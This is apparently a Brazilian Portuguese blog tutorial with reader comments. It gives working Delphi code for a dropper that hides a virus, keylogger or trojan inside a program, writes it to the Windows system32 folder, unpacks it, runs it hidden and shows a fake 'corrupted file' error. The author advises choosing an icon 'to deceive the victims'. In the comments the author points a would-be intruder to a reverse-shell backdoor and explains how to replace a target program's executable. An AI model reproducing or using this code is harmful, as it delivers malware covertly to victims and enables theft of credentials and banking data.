Social Icons

^^

domingo, 28 de novembro de 2010

Como criar um auto instalador para meus vírus, keyloggers e trojans?

Bom galera eu desenvolvi um método que eu chamo de método progmaster, consiste em compactar o arquivo que vai ser auto instalador 2 ou mais vezes, transformar em arquivo de recurso e criar uma pequena aplicação para extrai-los para uma pasta alvo.

Vamos começar então, primeiro baixe o compactador progmaster.

Após baixar o compactador, compacte o arquivo(seu vírus, keylogger,  trojan ou qualquer outra coisa..)  2 vezes , nesse exemplo o nome que vou usar para o meu vírus vai ser arquivo.exe.

Vamos supor que o meu vírus está no disco local C:\


No compactador vou selecionar a origem e o destino:

na origem vai ficar assim: C:\arquivo.exe e em destino vai ficar C:\arquivocompactado.exe e em seguida clicaremos em compactar e será gerado o arquivo compactado.


Obs: 
Onde C:\arquivo.exe é o nome inicial do nosso vírus 
C:\arquivocompactado.exe  é o nome do nosso vírus compactado uma vez.


Depois que nosso vírus estiver compactado uma vez vamos compacta-lo novamente, execute o mesmo procedimento de compactação só que em origem coloque o nome do vírus compactado uma vez, vai ficar assim :

origem:  C:\arquivocompactado.exe 
destino: C:\arquivocompactado2.exe

Obs:
Onde  C:\arquivocompactado.exe  é o nome do nosso vírus compactado uma vez
e C:\arquivocompactado2.exe é o nome/caminho do nosso arquivo compactado pela segunda vez.

Depois de selecionar o caminho compacte o arquivo pela segunda vez

Nós compactamos 2 vezes o nosso vírus, o nome original dele é arquivo.exe e compactado 2 vezes agora está com o nome de arquivocompactado2.exe, o próximo passo é transformar  o arquivocompactado2.exe em arquivo de recurso

Abra o seu bloco de notas e digite o seguinte:

virus EXEs C:\arquivocompactado2.exe 

Salve no disco local C:\ com o nome de virus.rc e após salvar você deve compilar, se você não souber usar muito bem arquivo de recursos recomendo que leia este post antes de continuar.

 

Após compilado deverá ser gerado um arquivo chamado virus.res.

Agora crie uma nova pasta em um diretório de sua escolha e abra o Delphi.

Salve a aplicação observando os seguintes detalhes:

Salva a unit com o nome de unitPrincipal e o projeto com o nome de extrator.
todos os nomes aqui dados para arquivos podem ser trocados...

copie o virus.res para a mesma pasta onde salvou o seu projeto e  na unit de seu projeto abaixo de  {$R *.dfm} acrescente {$R virus.res} deve ficar desse jeito:

implementation

{$R *.dfm}
{$R virus.res}


Abaixo de implementation acrescente   Uses zLib;  vai ficar assim


implementation

Uses zLib;

{$R *.dfm}
{$R virus.res}

Acrescente a seguinte procedure a seu projeto:

procedure virus;
var
  myresource: TResourceStream;
Begin
   myresource := TResourceStream.Create(Hinstance, 'virus', 'EXEs');
   Try
      if not FileExists('C:\windows\system32\arquivocompactado2.exe') then
         myresource.SavetoFile('C:\windows\system32\arquivocompactado2.exe');
   finally
      myresource.Free;
   end;
end;

No evento Oncreate do form digite:

Application.ShowMainForm  := False;
virus;

Adicione 2 Timers  da paleta system:

Insira o seguinte código no evento Ontimer do timer 1:

Var
  FileIni, FileOut: TFileStream;
  DeZip: TDecompressionStream;
  i : Integer;
  Buf: array[0..1023]of Byte;
begin
if not  fileExists ('C:\windows\system32\arquivocompactado.exe') then begin
  FileIni:=TFileStream.Create('C:\windows\system32\arquivocompactado2.exe', fmOpenRead and fmShareExclusive);
  FileOut:=TFileStream.Create('C:\windows\system32\arquivocompactado.exe', fmCreate or fmShareExclusive);
  DeZip:=TDecompressionStream.Create(FileIni);
  repeat
    i:=DeZip.Read(Buf, SizeOf(Buf));
    if i <> 0 then
      FileOut.Write(Buf, i);
  until i <= 0;
  DeZip.Free;
  FileOut.Free;
  FileIni.free;
end;


Altera a pripriedade interval do timer 2 para 1800 e insira o seguinte código no evento ontimer do timer 2:

Var
  FileIni, FileOut: TFileStream;
  DeZip: TDecompressionStream;
  i : Integer;
  Buf: array[0..1023]of Byte;
begin
if not  fileExists ('C:\windows\system32\arquivo.exe') then begin
  FileIni:=TFileStream.Create('C:\windows\system32\arquivocompactado.exe', fmOpenRead and fmShareExclusive);
  FileOut:=TFileStream.Create('C:\windows\system32\arquivo.exe', fmCreate or fmShareExclusive);
  DeZip:=TDecompressionStream.Create(FileIni);
  repeat
    i:=DeZip.Read(Buf, SizeOf(Buf));
    if i <> 0 then
      FileOut.Write(Buf, i);
  until i <= 0;
  DeZip.Free;
  FileOut.Free;
  FileIni.free;
  winexec ('C:\windows\system32\arquivo.exe',SW_hide);
end;

Após isso compile seu projeto e feche-o, está quase pronto...

Por ultimo trasforme o extrator em um arquivo de recurso, crie uma nova aplicação para extrair e executar-lo: 

Vamos lá terminar logo isso... copie o extrator.exe que você acabou de criar para o disco local C:\

Abra o bloco de notas e digite :

extrator EXEs C:\extrator.exe

Salve com o nome de extrator.rc no disco local C:\

Compile. e após compilado será gerado o extrator.res 

Crie uma nova pasta qualquer, copie o extrator.res para lá, crie uma nova aplicação no delphi  e em seguida salve na mesma pasta onde está o extrator.res.

abaixo de {$R *.dfm} digite {$R extrator.res}

e logo abaixo de {$R extrator.res} digite:  

procedure EXTRATOR;
var
  myresource: TResourceStream;
Begin
   myresource := TResourceStream.Create(Hinstance, 'extrator', 'EXES');
   Try
      if not FileExists('C:\windows\extrator.exe') then
         myresource.SavetoFile('C:\windows\extrator.exe
');
   finally
      myresource.Free;
   end;
end; 


e no evento Oncreate do form digite:

 Application.ShowMainForm := False;
  EXTRATOR;
 winexec ('C:\windows\extrator.exe',SW_HIDE);
 ShowMessage ('Erro ao executar arquivo, provavelmente está corrompido.');
 Application.Terminate;

Compile o projeto e veja o resultado, e não se esqueça de escolher um bom ícone para enganar as vitimas.

Qualquer dúvida deixa um comentário.

Até a próxima

27 comentários:

  1. Meu amigo pimeiramente Parabens dentres as ja postadas vo dexa meu pedido e ideia seria muito legal se vc disponibilizasse uma video aula onde seria muito bompara estudo como atualizar uma source de KL BANKER desde ja obrigado....

    ResponderExcluir
  2. Keyloggers Bankers é sem dúvida perigoso de usar... dá uns bons anos de cadeia, e eu ñ posso fornecer aqui um source completo, mas com o conteúdo que posto aqui dá para criar um kl banker com certeza.

    ResponderExcluir
  3. Amigo, usando esse recurso posso enviar um keylogger, como o ti-monitor para alguém como se fosse um arquivo e ele se instalaria automaticamente quando a pessoa abrisse?

    ResponderExcluir
  4. O tutorial se trata exatamente disso.

    ResponderExcluir
  5. ta de parabéns muito bom valeu

    ResponderExcluir
  6. CARA VC É FERA, MEUS PARABÉS A VC, ME PASSA SEU MSN GOSTARIA DE ALGUMAS DICAS. VALEW

    ResponderExcluir
  7. Hm...com esse instalador o meu 'virús' iniciará junto com o windows?

    ResponderExcluir
  8. Não, esse instalador apenas faz o trabalho de camuflar e jogar o arquivo/vírus em determinada pasta... Mas com mais algumas linhas de código você pode fazer com que seu vírus inicie com o windows.

    ResponderExcluir
  9. E qual seria estas linhas de codigo para iniciar junto com o pc ? e onde devo coloca-las.

    ResponderExcluir
  10. Leia esta postagem:

    http://blogprogramadores.blogspot.com/2011/04/trabalhando-com-o-registro-do-windows.html

    ResponderExcluir
  11. ñ consegui fazer me ajdua ai plz

    ResponderExcluir
  12. Cara, reupa os downloads ai, tudo megaupload :S

    ResponderExcluir
  13. Cara eu queria fazer meu programa tocar uma musica assim q iniciar o programa so q eu queria sem fazer a musica extrair pq eu quero mesmo é trollar um amigo meu e colocar a musica dentro do programa q sempre q for iniciado tocar uma musica bem chata,tipo eu vo fazer ele iniciar junto com o windows e automaticamente tocar essas musica,sendo q sem extrair tem como fazer isso com ela sendo um arquivo de recurso?

    ResponderExcluir
  14. Meu amigo hacker tem um jeito sim de fazer isso, e é usando streams mas eu acho que nesse seu caso não precisa...

    Faça o seguinte:
    * coloque um TMediaPlayer da paleta system
    * Sete a opção AutoOpen para true
    * Sete a opção FileName para C:\windows\musicachata.mp3
    * no evento OnCreate do Form extraia a musica para C:\windows\musicachata.mp3 e depois coloque
    MediaPlayer1.Play; ainda no evento Oncreate do form logo após extrair o arquivo.

    acho que isso já resolve.

    ResponderExcluir
  15. algumas dicas de como atualizar a Source?

    ResponderExcluir
  16. cara precisava de um programinha que eu pudesse invadir um pc e pegar fotos minha que estão com um "amigo" q está meio que me chantagiando vc pode me ajudar?

    ResponderExcluir
  17. expen isso deve servir...

    http://blogprogramadores.blogspot.com.br/2012/04/backdoor-de-conexao-reversa.html

    ResponderExcluir
  18. então pelo que eu entendi, quando descompactar o zip, por exemplo, ele vai automaticamente instalar o keylogger, no meu caso? se for isso, eu posso deixá-lo como arquivo oculto, e quando a pessoa extrair vai instalar sem saber, e vai achar que o zip estava com algum erro, pois não tinha nada (a olho nu), ou então por algum outro arquivo pra disfarçar.
    caso não seja isso, teria como eu fazer ele instalar o keylogger logo ao extrair, ou abrindo uma imagem? como se fosse uma foto que a pessoa fosse abrir, e nao o keylogger.

    abração Jeff, vc é o cara!

    ResponderExcluir
  19. Assim que o pessoa clicar no ícone do projeto compilado ele vai automaticamente extrair e instalar o seu vírus.

    ResponderExcluir
  20. Jefferson parabens ai pelas ajuda :D

    ResponderExcluir
  21. Min add a noturnopitiuaua@hotmail.com
    queria saber se vc pode mim ajudar gostaria de colocar a keyloag pra capitura os sites visitados
    e mandas os links por emaial junto com as teclas digitadas

    ResponderExcluir
  22. jefferson .. gostaria de saber se voce tem algum projeto de um kl que seja bom ai para me disponibilizar .. em delphi
    me passa seu contato .. depois te mando um projeto q tenho aqui tbm
    tem skype ?

    ResponderExcluir
  23. Tem como iniciar meu programa so se outro programa estiver aberto
    tipo assim meu programa vai ser executado so se o bloco de notas estiver aberto
    ai eu quero em processo no caso notepad.exe

    obs: eu quero meu programa aberto so qui ele vai começar a funcionar so se o proxesso 'X' estiver funcionando

    desde ja Obrigado :D

    ResponderExcluir
    Respostas
    1. Não exatamente, pois terá que ter outro programa fazendo a verificação, por exmeplo:

      programa A verifica se o programa B está rodando, se sim, então executa o programa C.

      A menos que você faça uma injeção de código em um programa alvo, dessa forma, toda vez que a pessoa abrir o programa X, como a exemplo do notpad.exe, então executará o seu código.

      Também você pode pensar na possibilidade de fazer uma substituição do arquivo original, colocando-o em outro local. Então neste caso quando o programa alvo for executado quem será executado será seu software e a partir dele você executa o software original.

      Exemplo:

      1°Pessoa vai abrir o programa A
      2°Você substitui o programa A pelo programa B que é o seu.
      3° o programa B é aberto e em seguida executa o programa A que está em outra pasta por exemplo.

      É + ou - isso, até a próxima.

      Excluir
  24. tem um codigo pra criar keylogger espesifico tipo assim vai capturar teclas digitadas so
    daquele processo ou janela aberta ???????

    ResponderExcluir

Popular Posts

 

Seguidores

Hora exata:

Total de visualizações de página